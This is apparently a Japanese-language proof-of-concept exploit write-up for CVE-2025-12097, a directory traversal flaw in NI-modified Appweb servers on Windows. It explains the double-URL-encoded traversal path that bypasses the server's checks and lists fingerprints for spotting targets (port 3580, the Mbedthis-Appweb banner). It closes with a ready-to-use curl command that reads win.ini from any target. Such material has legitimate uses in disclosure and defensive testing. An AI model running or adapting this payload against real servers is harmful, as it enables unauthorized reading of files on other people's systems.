
CVE-2025-12097の概念実証エクスプロイト。NI-modified Appwebサーバーにおけるディレクトリトラバーサルの脆弱性で、Windowsシステム上で任意のファイル読み取りを可能にします。
NI による Appweb サーバーの改変には、攻撃者がサーバー上の任意のファイルを読み取ることを可能にするディレクトリトラバーサルの脆弱性が含まれています。
URI パス /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini は次のように変換されます。
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 これは有効な URI であり、appweb はこのリクエストをブロックしません。その後、カスタムハンドラーに渡され、この場合リクエストされたファイルの内容が返されます。
影響を受けるソフトウェアの性質上、影響を受けるデバイスは専ら Microsoft Windows システムです。
確認された最も高い脆弱性バージョン: 12.0.0。
影響を受けるデバイスは、以下の特徴によって識別できます。
常に存在するわけではありませんが、ほとんどの場合、サービスはポート 3580 で動作しています。その他のポートには 8080 や 80 が含まれる場合があります。
/ へのサーバー応答
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
この脆弱性を悪用するには、次のコマンドを使用します。
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
ターゲットが脆弱な場合、win.ini ファイルの内容が表示されます。